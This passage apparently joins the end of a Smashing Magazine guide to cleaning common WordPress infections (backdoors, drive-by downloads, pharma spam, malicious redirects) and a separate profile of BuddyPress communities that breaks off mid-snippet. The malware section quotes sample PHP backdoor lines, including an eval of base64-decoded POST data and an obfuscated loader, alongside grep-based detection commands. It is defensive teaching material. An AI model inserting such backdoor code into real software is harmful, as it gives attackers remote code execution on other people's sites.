Automation through the use of bots is not their only mechanism. Today you also have malware automation: the use of tools to quickly generate a payload (i.e. the infection), allowing the attacker to focus strictly on gaining access to the environment. Once the hacker has access to the environment, they copy and paste in the auto-generated payload. One of the more prevalent automation tools is the Blackhole Exploit Kit. This and many other kits can be purchased online for a nominal fee. That fee buys sustainment services and keeps the kit updated with new tools for the latest vulnerabilities. It’s a true enterprise.

Common WordPress Malware Issues

Thousands of malware types and infections are active on the Internet; fortunately, not all apply to WordPress. For the rest of this post, we’ll look at four of the most common attacks on WordPress users:

• Backdoors,
• Drive-by downloads,
• Pharma hacks,
• Malicious redirects.

Backdoor

A backdoor lets an attacker gain access to your environment via what you would consider to be abnormal methods — FTP, SFTP, WP-ADMIN, etc. Hackers can access your website using the command line or even using a Web-based GUI like this:

A backdoor GUI. Click the image for the whole picture!

Backdoors are exceptionally dangerous. Left unchecked, the most dangerous can cause havoc on your server. They are often attributed to cross-site contamination incidents — i.e. when websites infect other websites on the same server.

How am I attacked?

The attack often happens because of out-of-date software or security holes in code. A vulnerability well known to the WordPress community was found in the TimThumb script that was used for image resizing. This vulnerability made it possible for hackers to upload a payload that functioned as a backdoor.

Here is an example of a scanner looking specifically for vulnerable versions of TimThumb:

What does it look like?

Like most infections, this one can be encoded, encrypted, concatenated or some combination thereof. However, it’s not always as simple as looking for encrypted code; there are several instances in which it looks like legitimate code. Here is an example:

Another example:

Below is a case where the content is hidden in the database and targets WordPress installations:

return @eval(get_option(\’blogopt1\’));

And here is a very simple backdoor that allows any PHP request to execute:

eval (base64_decode($_POST["php"]));

Here is an example of a messy backdoor specifically targeting the TimThumb vulnerability:

Here is another backdoor that commonly affects WordPress installations, the Filesman:

How can I tell whether I’m infected?

Backdoors come in all different sizes. In some cases, a backdoor is as simple as a file name being changed, like this:

• wtf.php
• wphap.php
• php5.php
• data.php
• 1.php
• p.php

In other cases, the code is embedded in a seemingly benign file. For instance, this was found in a theme’s index.php file, embedded in legitimate code:

Backdoors are tricky. They constantly evolve, so there is no definitive way to say what you should look for.

How do I prevent it?

While backdoors are difficult to detect, preventing them is possible. For the hack to be effective, your website needs an entry point that is accessible to the hacker. You can close backdoors by doing the following:

1. Prevent access.
   Make your environment difficult to access. Tony recommends a three-pronged approach to locking down wp-admin:
   • Block IPs,
   • Two-factor authentication,
   • Limited access by default.

   This will make it extremely difficult for anyone except you to access your website.

2. Kill PHP execution.
   Often the weakest link in any WordPress chain is the /uploads/ directory. It is the only directory that needs to be writable in your installation. You can make it more secure by preventing anyone from executing PHP. It’s simple to do. Add the following to the .htaccess file at the root of the directory. If the file doesn’t exist, create it.

<FilesMatch *.php>
Order Deny, Allow
Deny from All
</Files>

How is it cleaned?

Once you have found a backdoor, cleaning it is pretty easy — just delete the file or code. However, finding the file can be difficult. On his blog, Canton Becker provides some advice on ways to scour your server for backdoors. There is no silver bullet for backdoors, though, or for any infection — backdoors can be simple or complex. You can try doing some basic searches for eval and base64_decode, but if your code looks like what’s below, then knowing what to look for becomes more difficult:

$XKsyG=’as’;$RqoaUO=’e’;$ygDOEJ=$XZKsyG.’s’.$RqoaUO.’r’.’t’;$joEDdb=’b’.$XZKsyG.
$RqoaUO.(64).’_’.’d’.$RqoaUO.’c’.’o’.’d’.$RqoaUO;@$ygDOEJ(@$joEDdb(‘ZXZhbChiYXN
lNjRfZGVjb2RlKCJhV1lvYVhOelpY…

If you are familiar with the terminal, you could log into your website using SSH and try certain methods. The most obvious and easiest method is to look for this:

# grep -ri "eval" [path]

Or for this:

# grep -ri "base64_decode" [path]

The r ensures that all files are scanned, while the i ensures that the scan is case-insensitive. This is important because you could find variations of eval: Eval, eVal, evAl, evaL or any other permutation. The last thing you want is for your scan to fall short because you were too specific.

Look for recently modified files:

find -type f -ctime -0 | more

The -type looks for files, and -ctime restricts your scan to the last 24 hours. You can look at the last 24 or 48 hours by specifying -1 or -2, respectively.

Another option is to use the diff command. This enables you to detect the differences between files and directories. In this case, you would use it for directories. For it to be successful, though, you need to have clean copies of your installation and themes. So, this works only if you have a complete backup of your website.

# diff -r /[path]/[directory] /[path]/[directory] | sort

The -r option is recursive through all directories, and the sort command sorts the output and makes it easier to read. The key here is to quickly identify the things that don’t belong so that you can run integrity checks. Anything you find that is in the live website’s directory but not in the backup directory warrants a second look.

Drive-By Downloads

A drive-by download is the Web equivalent of a drive-by shooting. Technically, it is usually embedded on your website via some type of script injection, which could be associated with a link injection.

The point of a drive-by download is often to download a payload onto your user’s local machine. One of the most common payloads informs the user that their website has been infected and that they need to install an anti-virus product, as shown here:

How does the attack get in?

There are a number of ways an attack can get in. The most common causes are:

• Out of date software,
• Compromised credentials (wp-admin, FTP),
• SQL injection.

What does it look like?

Below are a number of examples of link injections that lead to some type of drive-by download attack:

And this:

And this:

More recently, drive-by downloads and other malware have been functioning as conditional malware — designed with rules that have to be met before the infection presents itself. You can find more information about how conditional malware works in Sucuri’s blog post “Understanding Conditional Malware.â€�

How can I tell whether I’m infected?

Using a scanner such as SiteCheck to see whether you are infected is possible. Scanners are pretty good at picking up link injections. Another recommendation is to sign up for Google Webmaster Tools and verify your website. In the event that Google is about to blacklist your website, it would email you beforehand notifying you of the problem and giving you a chance to fix it. The free service could pay dividends if you’re looking to stay proactive.

Outside of using a scanner, the difficulty in identifying an infection will depend on its complexity. When you look on the server, it will look something like this:

The good news is that such an infection has to be somewhere where an external output is generated. The following files are common places where you’ll find link injections:

• wp_blog_header.php (core file)
• index.php (core file)
• index.php (theme file)
• function.php (theme file)
• header.php (theme file)
• footer.php (theme file)

About 6 times out of 10, the infection will be in one of those files. Also, your anti-virus software might detect a payload being dropped onto your computer when you visit your website — another good reason to run anti-virus software locally.

Sucuri has also found link injections embedded in posts and pages (as opposed to an originating PHP file), as well as in text widgets. In such cases, scrub your database and users to ensure that none of your accounts have been compromised.

How is it cleaned?

Cleaning can be a challenge and will depend on your technical skill. You could use the terminal to find the issue.

If you have access to your server via SSH, you’re in luck. If you don’t, you can always download locally. Here are the commands that will be of most use to you when traversing the terminal:

• CURL
  Used to transfer data with a URL syntax.
• FIND
  Search by file or directory name.
• GREP
  Search for content in files.

For example, to search all of your files for a particular section of the injection, try something like this:

$ grep -r "http://objectcash.in" .

Including the following characters is important:

• "
  Maintains the integrity of the search. Using it is important when you’re searching for special characters because some characters have a different meaning in the terminal.
• -r
  Means “recursive� and will traverse all directories and files.

You can also refine your search by file type:

$ grep --include ".php" -r "http://objectcash.in" .

Enabling the --include option allows you to specify file type; in this instance, only PHP files.

These are just a few tricks. Once you’ve located the infection, you have to ensure that you remove every instance of it. Leaving just one could lead to serious frustration in the future.

Pharma Hack

Pharma hack is one of the most prevalent infections around. It should not be confused with malware; it’s actually categorized as SPAM — “stupid pointless annoying messages.â€� If you’re found to be distributing SPAM, you run the risk of being flagged by Google with the following alert:

This site may be compromised!!

This is what it will look like on Google’s search engine results page (SERP):

How am I attacked?

The pharma SPAM injection makes use of conditional malware that applies rules to what the user sees. So, you may or may not see the page above, depending on various rules. This is controlled via code on the server, such as the following:

Some injections are intelligent enough to create their own nests within your server. The infection makes use of $_SERVER["HTTP_REFERER"], which redirects the user to an online store that is controlled by the attacker to generate revenue. Here is an example of such a monetized attack:

Like most SPAM-type infections, pharma hack is largely about controlling traffic and making money. Money can be made through click-throughs and/or traffic. Very rarely does a pharma hack injection redirect a user to a malicious website that contains some additional infection, as with a drive-by download attempt.

This is why it’s so difficult to detect. It’s not as simple as querying for “Cialis� or “Viagra,� although that’d be awesome. Most people would be surprised by the number of legitimate pharmaceutical companies that exist and publish ads on the Web. This adds to the challenge of detecting these infections.

What does it look like?

Pharma hack has evolved, which has made it more difficult to detect. In the past, SPAM injections would appear in your pages, where they were easy to find and, more importantly, remove.

Today, however, pharma hack is quite different. It uses a series of backdoors, sprinkled with intelligence, to detect where traffic is coming from, and then it tells the infection how to respond. Again, it can behave as conditional malware. More and more, pharma hack reserves its payload for Google’s bots; the goal is to make it onto Google’s SERPs. This provides maximum exposure and the biggest monetary return for the hackers.

Here’s an image of an old pharma hack injecting SPAM into a blog’s tags:

Another version of pharma hack was injected in such a way that when the user clicks on an apparently benign link (such as “Home,� “About� or “Contact�), it redirects the user to a completely different page. Somewhere like this:

How do I tell whether I’m infected?

Identifying an infection can be very tricky. In earlier permutations, identifying an infection was as easy as navigating your website, looking at your ads, links, posts and pages, and quickly determining whether you’ve been infected. Today, there are more advanced versions that are harder to find.

The good news for diligent webmasters is that by enabling some type of auditing or file monitoring on your WordPress website, you’ll be able to see when new files have been added or when changes have been made. This is by far one of the most effective methods of detection.

You could try using free scanners, such as SiteCheck. Unfortunately, many HTTP scanners, including Sucuri’s, struggle with the task because pharma hack is not technically malicious, so determining the validity of content can be difficult for a scanner.

How is it cleaned?

First, identify the infected files, and then remove them. You can use the commands we’ve outlined above, and you can make queries to your website via the terminal to quickly see whether you’re serving any pharma SPAM to your visitors.

When combatting pharma hacks, one of the most useful commands is grep. For example, to search for any of the ads or pharma references being flagged, run this:

# egrep -wr 'viagra|pharmacy' .

By using egrep, we’re able to search multiple words at the same time if necessary, thus saving you time in this instance.

Or try something like this:

# grep -r "http://canadapharmacy.com" .

This only works if the infection is not encoded, encrypted or concatenated.

Another useful method is to access your website via different user agents and referrers. Here is an example of what one website looked like when using a Microsoft IE 6 referrer:

Try Bots vs Browsers to check your website through a number of different browsers.

Terminal users can also use CURL:

# curl -A "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" http://somesite.com

How do I prevent it?

Preventing a pharma hack can be tricky. Sucuri has found that the hack regularly exploits vulnerable out-of-date software. However, your out-of-date WordPress installation is not necessarily the problem. Even if you are up to date, another outdated installation on the same server could be vulnerable to the infection. If the real payload resides elsewhere on your server, not within your website’s directory, then catching it can be exceptionally difficult.

Here is an example of what you might be looking for if you can’t find the infection in your own installation:

To prevent a pharma hack, you should do two things:

1. Keep your software up to date,
2. Steer clear of soup-kitchen servers.

Malicious Redirects

A malicious redirect sends a user to a malicious website. In 2010, 42,926 new malicious domains were detected. In 2011, this number grew to 55,294. And that just includes primary domains, not all of their subdomains.

When a visitor is redirected to a website other than the main one, the website may or may not contain a malicious payload. Suppose you have a website at myhappysite.com; when someone visits it, the website could take the visitor to meansite.com/stats.php, where the malicious payload is in that website’s stats.php file. Or it could be a harmless website with just ads and no malicious payload.

How am I attacked?

As with many malware attacks, it comes down to access. The malicious redirect could be generated by a backdoor. The hacker would scan for a vulnerability, such as TimThumb or old versions of WordPress and, when they find it, upload a payload that functions as a backdoor.

What does it look like?

Detecting a redirect is not as complex as detecting some of the other infections. It is often found in your .htaccess file and looks something like this:

Or like this:

There may be instances where a redirect is encoded and resides in one of your PHP files. If so, it will usually be found in your header.php, footer.php or index.php file; it has also been known to reside in the root index.php file and in other core template files. It is not always encoded, but if it is, it will look something like this:

How do I tell if I am infected?

There are a few ways to check for infections. Here are some suggestions:

• Use a free scanner, such as SiteCheck. They very rarely miss malicious redirects.
• Test using Bots vs Browser.
• Listen to your users. You might not detect the redirect, but sometimes a user will alert you to it.

If a user does detect a problem, ask them pertinent questions to help diagnose the problem:

• What operating system are they using?
• What browser(s) are they using, and which version(s)?

The more information you get from them, the better you can replicate the issue and find a fix.

How is it cleaned?

Malicious redirects are one of the easiest infections to clean. Here’s a good starting point:

1. Open your .htaccess file.
2. Copy any rewrite rules that you have added yourself
3. Identify any malicious code, like the sample above, and remove it from the file. Scroll all the way to the bottom of .htaccess to make sure there aren’t any error directives pointing to the same infection.

Be sure to also look for all .htaccess files on the server. Here is one quick way to see how many exist on your server:

# find [path] -name .htaccess -type f | wc -l

And this will tell you where exactly those files are:

# find [path] -name .htaccess -type f | sort

The infection is not always restricted there, though. Depending on the infection, you might also find the redirect encoded and embedded in a file such as index.php or header.php.

Alarmingly, these infections can replicate across all of your .htaccess files. The backdoor responsible for it can also be used to create multiple .htaccess files across all of your directories, all with the same infection. Removing the infection can feel like an uphill struggle, and sometimes cleaning every file you can find is not enough. There are even cases where a file is created outside of the Web directory. The lesson is always look outside of your Web directory as well as within it.

How do I prevent it?

A quick and easy method is to change ownership of the file, or to reduce the file’s permissions so that only the owner has permission to modify it. However, if your root account is compromised, that won’t do you much good.

The most important file to take care of is .htaccess. Check out the tutorial “Protect Your WordPress Site with .htaccessâ€� for tips on doing that.

Conclusion

There you have it: four prevalent attacks that cause havoc across many WordPress installations today. You might not feel better if you get hacked, but hopefully, with this bit of knowledge, you’ll feel more confident that the hack can be cleaned and that your website can be returned to you. Most importantly, if you take one thing away from this: always keep WordPress updated.

Tony’s Top Ten Security Tips

1. Get rid of generic accounts, and know who is accessing your environment.
2. Harden your directories so that attackers can’t use them against you. Kill PHP execution.
3. Keep a backup; you never know when you’ll need it.
4. Connect securely to your server. SFTP and SSH is preferred.
5. Avoid soup-kitchen servers. Segment between development, staging and production.
6. Stay current with your software — all of it.
7. Kill unnecessary credentials, including for FTP, wp-admin and SSH.
8. You don’t need to write posts as an administrator, nor does everyone need to be an administrator.
9. If you don’t know what you’re doing, leverage a managed WordPress hosting provider.
10. IP filtering + Two-factor authentication + Strong credentials = Secure access

Tony’s Most Useful Security Plugins

• Sucuri Sitecheck Malware Scanner
  This plugin from Tony and the Sucuri crew enables full malware and blacklist scanning in your WordPress dashboard, and it includes a powerful Web application firewall (WAF).
• Login Lock
  This enforces strong password policies, locks down log-ins, monitors log-ins, blocks hacker IPs and logs out idle users.
• Two-Factor Authentication
  This plugin enables Duo’s two-factor authentication, using a service such as a phone callback or SMS message.
• Theme-Check
  Test your theme to make sure it’s up to spec with theme review standards.
• Plugin-Check
  Does what Theme-Check does but for plugins.

Security Tools

• Sucuri SiteCheck
• Unmask Parasites scanner

Security Resources

• Sucuri Blog
• “Securityâ€�, Perishable Press
• Unmask Parasites Blog
• Badware Busters
• WPsecure
• Locking Down WordPress, Michael Pick

Useful Security Articles

• “10 Useful WordPress Security Tweaks,â€� Jean-Baptiste Jung
• “10 Steps to Secure Your WordPress Installation,â€� Fouad Matin
• “Google Blacklist Warnings: Something’s Not Right Here,â€� Tony Perez
• “Hardening WordPress,â€� WordPress Codex
• “How to Stop the Hacker and Ensure Your Site Is Locked,â€� Tony Perez
• “Website Malware Removal: WordPress Tips and Tricks,â€� Tony Perez

(al)

---

© Siobhan McKeown for Smashing Magazine, 2012.

BuddyPress is social networking in a box, the loveable plugin that has people around the world getting social. But using BuddyPress isn’t all about waking up one morning and being struck by the amazing idea of creating the next Facebook. BuddyPress is a tool for creating communities. In fact, if you look at successful implementations of BuddyPress, you’ll see they aren’t Facebook clones, but rather niche groups that have put BuddyPress to work in growing their community. The 1.7 release should make BuddyPress compatible with any WordPress theme, making it even more accessible to potential community builders.

But people are already doing it successfully. In this article, we’ll look at some of them — five communities that are using BuddyPress, some big, some small, some established, some emerging, some successful and some unsuccessful.

The University: CUNY Academic Commons

Current membership: 3,100

The CUNY Academic Commons is an academic network of graduate students, staff, faculty and administrators across the 24 campuses of the City University of New York. It has two main aims: first, to foster connections between members of CUNY. As a community with 24 campuses across New York City, CUNY is highly distributed. Members might share interests with people who are only a few miles from each other yet never have occasion to meet. Secondly, CUNY aims to “provide a space where members can do work, as individuals or collaboratively, in a way that is flexible, powerful, and visible to a larger public.�

Who Is Behind It?

The Commons was conceived and created by CUNY faculty members. The project director is Matthew K. Gold, a professor of English at NYC College of Technology and CUNY Graduate Center. A committee comprising faculty and staff from across CUNY is responsible for overseeing the website’s strategy and policies.

The development and community teams are responsible for the day-to-day technical maintenance and community building around the website. They are made up of around 10 people, most of whom are CUNY faculty or students. The development team takes care of maintaining the website and fixing bugs. They are all active members of the WordPress community. Boone Gorges is on the core BuddyPress team, and the CUNY Academic Commons has sponsored the development of many public-facing plugins.

Besides the development team, the community facilitators handle the non-technical aspects of community management. They’re responsible for website support and documentation. The community facilitators are the people who foster connections across the website, monitor the network’s activity and write round-up posts. The key to success for the Commons has been the active community team. As developer Boone Gorges says, “No matter how good the tools are, communities don’t form themselves; our facilitators keep up the energy and activity levels on the site, moving the community forward.�

Why BuddyPress?

The Commons was inspired by work done by Jim Groom and his team at the University of Mary Washington (UMW) on the UMW Blogs platform, which is built on WordPress. CUNY is a public university, and thus the team felt that using and supporting free software was important. As it was building the Commons, BuddyPress was nearing its 1.0 release. It was also the only real social-networking plugin for WordPress.

The Commons is a community of academics focused on collaborative work and, as such, has needed a large number of customizations to enable collaborative writing and discussion. It worked to the team’s advantage that BuddyPress was conceptualized from the start as a platform for further development, taking advantage of WordPress’ rich plugin architecture. Had the team used a proprietary platform or even an open-source alternative, it never would have been able to make the improvements it did, such as optimizations to the group forums, the creation of collaborative editing spaces, better filtering of member directories, and support for full email notifications of new activity. BuddyPress’ freedom and flexibility enabled the team to create a platform geared to the needs of its community.

How the Commons Works

The Commons is intended to be a flexible and open space for collaboration. Users can create groups, blogs or wiki pages (or even all three). Membership is restricted to individuals with a cuny.edu email address, which means they haven’t had any issues requiring moderation.

Boone outlines some typical use cases:

• Interest groups
  Individuals who share a common interest — Spanish language, poetry, games and education, bicycle culture in New York City — may use the group’s infrastructure for conversation and collaboration.
• Conferences and events
  When a CUNY school is to host an academic conference, a Commons blog may be used to publicize the event, and a group might be established to foster communication about the event.
• Graduate courses
  Classes held on the Commons use blogs for public-facing writing and use groups for their private discussion forums and other collaborative features.
• Committee work
  When an administrative committee needs a place to share documents and engage in ongoing discussion about its work, it often turns to Commons groups.
• Academic journal publications
  Several academic journals have recently found a home on the Commons. For a given journal, a WordPress blog is used for publication, while a private group is used for planning and review.
• Academic departments
  Several academic departments use Commons groups as a replacement for listservs. They share news and documents with each other and have discussions in the forums.

Every CUNY member has their own profile.

The Commons’ current theme is a child theme of BuddyPress’ default theme. Recently, the Commons was awarded a grant from the Alfred P. Sloan Foundation to develop the Commons in a Box software package, which will include some of CUNY’s more popular customizations. An important aspect of this will be the default theme, which will be built with the Infinity Theming Engine (by Infinity’s developers, Marshall Sorenson and Bowe Frankema). Later this year, the Commons will have its own theme converted to use the Commons in a Box theme.

There are some challenges to face. For example, CUNY uses MediaWiki for the wiki section of the website. The team managed to create a single sign-on for WordPress and MediaWiki, but managing the link between them — in terms of theming consistently, supporting different interfaces for user input, sharing log-ins and consolidating activity — has been an ongoing challenge.

The biggest challenge, however, has been resources. Boone has this to say:

Our team has a lot of great ideas about how to improve our site and BuddyPress itself, but it’s hard to put all these ideas into motion. Our development team has perhaps more BuddyPress-specific development talent than any other dev team out there — but we still don’t have enough developers with BuddyPress knowledge. (Hint hint: WordPress professionals who are looking for clients would do well to learn BuddyPress. There’s lots of work to be done.)

Customizations and Plugins

The CUNY members’ directory

The CUNY Commons team and members of the Commons have developed and co-developed dozens of plugins, many of which are publicly available in WordPress’ plugins repository.

Notable examples include:

• Invite Anyone
  To expand BuddyPress’ invitation abilities.
• BuddyPress Group Email Subscription
  For fine-grained control of emails and digest notifications of group activity.
• BuddyPress Docs
  For group-based document collaboration.

CUNY regularly releases custom plugins.

Some Commons customizations have been integrated into BuddyPress and WordPress. For example, the profile visibility features in BuddyPress 1.6 were built for the Commons, while the AJAX autosuggest for adding users to blogs in WordPress 3.4 is based on one of its patches.

Smaller pieces of functionality have been published by the team on its development blog.

In terms of plugins, the most important ones for CUNY Commons are these:

• BuddyPress Docs
  This lets users collaborate on writing important documents without resorting to third-party solutions like Google Docs. It provides full version history using WordPress’ post revisions, and it integrates fully with BuddyPress’ activity streams.
• BuddyPress Group Email Subscription
  This lets group members subscribe to email notifications with fine-grained control. Users can have different subscription settings for each group, ranging from immediate notification of each piece of group activity, all the way down to weekly digests summarizing important activity in all your groups.

Advice

Boone has this piece of advice for people starting out with their own BuddyPress community:

Think outside the BuddyPress box. Out of the box, BuddyPress is a great system, but it doesn’t (and can’t) meet all the needs of every community. So, before you start, you should have a sense of how you want your community members to engage with each other, and then think about the ways in which the software can help them do so. In contrast, don’t let BuddyPress’ default settings dictate the way you set up your community site — BuddyPress’ inherent flexibility and customizability mean that you don’t have to settle for what you get when you first download the software.

Free Pass

I asked each of my interviewees what they would integrate into BuddyPress’ core if they had one free pass. The Commons is in the lucky position of having a lead developer who is one of the core committers to BuddyPress. With respect to CUNY Academic Commons, BuddyPress doesn’t need many more user-facing features, but it does need under-the-hood improvements to make it easier to extend and customize. This has been happening throughout the 1.5 and 1.6 development cycles, which have seen improvements to performance and scaling, as well as additional developer APIs for easy hooking into BuddyPress’ core frameworks. As BuddyPress’ core becomes more stable and lean, the team at CUNY will be able to build even more custom plugins and functionality, which can be used in the Commons and disseminated to the wider community.

The Pilot: Rockhaq

Current membership: 50

Rockhaq is a music journalism community for schools and colleges. It has just finished a limited pilot and is on the verge of rolling out to other schools in the UK. Its aim is to motivate students to write music reviews, with a view to increasing student engagement and improving literacy skills. The top students in the community have been rewarded with live music missions, and Rockhaq has given away tickets for acts such as Blink 182 and Nicki Minaj and provided interview opportunities with bands that students have wanted to speak with. According to Michelle Dhillon, Rockhaq “merges the virtual and real-life worlds together to create a dynamic uber-social journalism network.�

Chuffed to see @takeabow30 started writing his Blink 182 review straight after last night’s show in Notts. Watch out for it on site soon :)

– @rockhaq

@michelledhillon @rockhaq THANKYOU, THANKYOU ONCE AGAIN. You have fulfilled a lifetime dream that will resonate with me for years to come.

– @takeabow30

Who Is Behind It?

The brain behind Rockhaq is Michelle Dhillon, a professional journalist and editor. She singlehandedly oversees all community and editorial aspects, including providing lectures and tips on improving writing skills, choosing the top five weekly reviews and the review of the week, and liaising with community members both on an off site.

In addition to Michelle, a team of three Web developers have helped to build and design the community platform and provide support. Michelle is looking to extend Rockhaq into teaching live music photography, so she has enlisted the help of music photographer and teacher Phil Swift.

Why BuddyPress?

Rockhaq members can unlock achievements that appear in their profile.

I asked Michelle why she chose BuddyPress over other platforms:

I was always going to use the WordPress platform; that was a given. I love this solution because it’s so flexible and puts a lot of power into the hands of the end user to be able to change and adapt the features they want really easily. BuddyPress wasn’t always in my plans, but I always intended to use a gaming plugin, and I was really impressed with Paul Gibbs’ Achievements plugin. This was my main reason for choosing BuddyPress, and I’m so glad I did because it’s a really nifty community package.

Michelle’s primary reason for using BuddyPress was the Achievements plugin, but she also likes that BuddyPress allows you to turn certain social-networking elements off very quickly. This has been a significant help, especially for running a pilot in which the environment needs to be as controlled as possible.

Rockhaq was built by Tammie Lister on a customized version of the BuddyPress default theme. It makes use of music photographer Phil Swift’s photos from live gigs of acts such as The Ting Tings, The Hives, Justice and Kasabian. This gives the platform its own unique online identity. As Michelle says, “The work here has been done so cleverly and intelligently — it looks and feels fantastic, and most importantly, it is us.â€�

Because it is still being piloted, Michelle hasn’t had to do any major customizations. It is important that the features be simple and uncomplicated because the developers want to test the basics of the platform thoroughly. The only alteration they have made is to remove status updates from BuddyPress’ core.

Challenges

The activity stream is moderated but still fun and interactive.

A very real issue that Michelle has had to tackle is cyber-bullying. This is a big concern in educational environments that use social networking, so Michelle has had to assure teachers and schools that the community is safe and regulated for students. Thus, it needs to be moderated, or at least be closely observed. At the same time, it needs to be fun and allow for interaction, so comments and public messages are permitted.

So far, Rockhaq hasn’t faced any major problems, besides a few members posting immature comments, which were moderated and quickly removed. Part of the ethos behind Rockhaq is “educating young people about how to use social networks in a positive and fruitful way, rather than foster and perpetuate negative behavior that has been generated by unregulated or poorly regulated social networks like Facebook.�

Plugins

• Achievements
  This has been and continues to be the most important plugin for Rockhaq. It is invaluable in keeping the students motivated.
• Gravity Forms
  This works for Rockhaq because it is usable and flexible. Michelle uses it for contact forms and mailing list queries and to help users spread the word.
• Twitter Widget Pro
  Some Twitter plugins don’t work well or refresh properly, but this one does. Twitter is hugely important to Rockhaq because it enables students to stay in touch with what’s going on. The Twitter feed is even more important than Facebook.

Advice

I asked Michelle what advice she would give to someone starting their own BuddyPress community:

Be prepared — for anything! That includes positive as well as negative incidents. We’ve been very excited as ours have been overwhelmingly positive, but you still have to be prepared for users logging on at all hours, adding much more work than you’d anticipated and being obsessed with your community. Also, be prepared to publicize it — we’ve been featured in major local media already, and I didn’t expect that either. You will be working all hours!

Free Pass

Michelle seemed excited by the thought of adding a feature to BuddyPress’ core. “I’m like a kid in a sweet shop when it comes to plugins, and one is never enough,� she says. “However, if you had to ask me, then I would be very biased and say a group blogging feature. This seems to make sense for a social networking plugin that uses WordPress, the mother of all open-source blog networks!�

The Newspaper: My Telegraph

Current membership: 130,000 active users; 3000 who blog regularly; 5000 – 10,000 daily commenters on The Telegraph

My Telegraph was started in 2006 to provide an online home for readers of British daily newspaper The Telegraph. The team at The Telegraph recognized that people were reading news on all sorts of websites, but that their most loyal readers identified themselves with The Telegraph and valued discussion with like-minded people. The first version of the website was designed so that people could blog in three clicks, but over the years they added more sophisticated functionality, such as profiles and groups, so they moved to BuddyPress.

Who Is Behind It?

My Telegraph has a dedicated developer, core BuddyPress developer Paul Gibbs, and a community manager, Kate Day, both of whom spoke to me for this article. In addition, specialist editorial teams run specific groups. For example, the Books desk looks after the Short Story Club. And a team of moderators monitor all user-generated content on My Telegraph, as well as on the main Telegraph website.

Why BuddyPress?

While various out-of-the-box solutions exist, BuddyPress is the most advanced in functionality. Another important factor in the team’s decision was that BuddyPress has a community of developers that actively enhance the platform and come up with ideas that the folks at The Telegraph might not come up with. A fringe benefit is that, while blogging takes more than three clicks, many people are familiar with WordPress’ user experience.

By implementing BuddyPress, My Telegraph has been able to scale beyond a blogging platform to a platform for general engagement.

How It Works

Moderators, journalists and even a novelist take care of the different groups.

With a community on that scale, I wanted to know what approach the team takes to moderation. Here’s what Kate has to say:

We try to take a light touch to moderation. My Telegraph is very much our readers’ space — journalists set the agenda elsewhere on our website! Nothing is screened before it goes live, and moderators simply work through a queue of flags that are generated when readers click on the “Reportâ€� buttons. Some of the groups are slightly more structured, with journalists, freelancers and, in one case, a novelist, leading the conversations via a group blog.

Moderation is the biggest challenge the team faces. The team needs to find the right balance between allowing people to enjoy a free-flowing conversation while preventing things from turning nasty. Spam is another issue — My Telegraph ranks high on Google and is a magnet for spammers.

Plugins

Like CUNY Commons, My Telegraph has its own WordPress.org profile page. So far, the team has released the Expire User Passwords plugin, which forces users to change their passwords every 30 days. Paul often looks for things that would be of use to other websites to open source. He plans to release more soon.

My Telegraph runs a lot of bespoke plugins and tweaks, such as the Group Competition plugin and the upcoming Bookshelf feature. Its most useful third-party plugin is BP Group Blogs, which ties together blogs and groups. Unfortunately for Paul, the plugin is quite old and can cause problems when the website is updated.

Advice

Both Paul and Kate had advice for people starting a BuddyPress community.

Here’s Kate’s take, from the community manager’s perspective:

Communities are like gardens. They take time to grow, and they need some care and attention. Don’t expect results straight away, but when relationships start growing between members of your community, the results are fantastic and constantly surprising. We’ve had members create a collaborative eBook, meet up for coffee mornings, even go on holiday together! And I hope a great many more people have enjoyed some really interesting discussions.

And Paul, from the developer’s perspective:

Start small. Launch early with a small piece of your intended functionality, and grow your community as you grow your site. Otherwise, it’s very easy to end up with so much “stuff� on the site that new users aren’t sure what they should be doing.

And make sure you have someone on the site participating with your community regularly and talking to them. You need to encourage your community to grow, as it won’t if it’s left alone by itself.

Free Pass

Paul, like Boone, is a BuddyPress core developer, so he always gives input into which features to integrate in BuddyPress’ core. However, for The Telegraph he would like to add a group management screen to the WordPress admin area. This would be similar to the activity management screen that appeared in BuddyPress 1.6. Dealing with users in groups is something that My Telegraph does a lot. Luckily for Paul, BuddyPress 1.7 will have exactly that.

The Non-Profit: Shift.ms

Current membership: 3631

Shift.ms is an online social support network for people with multiple sclerosis (MS). Over 2.5 million people (“MSers�) worldwide have this chronic neurological condition. People are most commonly diagnosed with MS in their 20s and 30s. Shift.ms founder George Pepper was diagnosed when he was 22, and at the time he found it difficult to find people his own age who were having a similar experience.

MS is progressive, so newly diagnosed MSers have different needs than those who have been living with it for many years. In 2007, George set up Shift.ms as a peer support network for young MSers.

Who Is Behind It?

Shift.ms is a community-led organization, and all of its members provide the content and decide on its direction. It has two ongoing employees, George himself and a community coordinator, Beki. BuddyPress designer and developer Tammie Lister is responsible for the design and development of the website, and WP Valet takes care of ongoing support and hosting.

Why BuddyPress?

I asked the team members why they chose BuddyPress over other solutions. For them, the strength of BuddyPress lay in the thriving community around it. In addition, a lot of plugins existed, which meant they could extend BuddyPress on a tiny budget.

Shift.ms already had an online magazine that was built using WordPress, so using BuddyPress enabled it to easily integrate its community with that. The particular advantage for Shift.ms, however, was that members could create and update their own profiles.

Much of the activity takes place in the forum.

Community members hang out mainly in the forum, where they can ask questions about living with the condition that they might not want to ask a health professional or a loved one. While all of the comments are read by George and Beki, moderating them is not usually necessary because the community is good at self-moderation and spots any occasional spam accounts that slip under the radar.

The theme itself is a custom child theme of the BuddyPress default. It has had heavy customization and uses several different custom post types. However, the main challenge has been finding a balance between the expected behavior of the community and what BuddyPress and WordPress can do; these things aren’t always in harmony.

Snippets

I asked Shift.ms if it had any code snippets to share. The one below was written by BuddyPress core developer Paul Gibbs. The team needed to solve an issue in which an external company had provided a video template as a page. Shift.ms wanted the page comments to appear in the stream (they usually don’t).

function shiftms_addpagecomments() {
     return array( 'page', 'post' );
}
add_filter( 'bp_blogs_record_comment_post_types', 'shiftms_addpagecomments' );

Shift.ms needs a range of excerpt sizes, and this snippet lets them achieve that:

function shiftms_string_limit_words($string, $word_limit) {
     $words = explode(' ', $string, ($word_limit + 1));
     if(count($words) > $word_limit)
     array_pop($words);
     return implode(' ', $words);
}

This function is called using:

<?php  $excerpt = get_the_excerpt(); 
     echo shiftms_string_limit_words($excerpt, 20);?>

In some places, opening links in a new window is necessary:

function shiftms_openlinks($text) {
     $return = str_replace('<a href = ', '<a target = "_blank" href = ', $text);
     $return = str_replace('<a target = "_blank" href = "http://shift.ms', '<a href = "http://shift.ms', $return);
